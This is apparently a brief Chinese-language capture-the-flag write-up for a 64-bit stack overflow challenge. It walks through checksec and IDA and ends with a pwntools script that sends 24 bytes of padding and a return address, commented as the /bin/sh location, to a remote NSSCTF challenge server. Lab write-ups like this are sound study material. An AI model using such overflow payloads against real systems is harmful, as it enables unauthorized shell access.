直接checksec一下,64位
先直接连接一下
没用,接下来去分析一下代码,进IDA
找到溢出点,16
再找到攻击点
然后就是写攻击脚本了
from pwn import *
io = remote('node4.anna.nssctf.cn',28233)
#elf=ELF('./pwn')
flag=0x004005B6 #bin\sh 地址
payload=b'a'*(16)+b'b'*(8)+p64(flag)
io.sendline(payload)
io.interactive()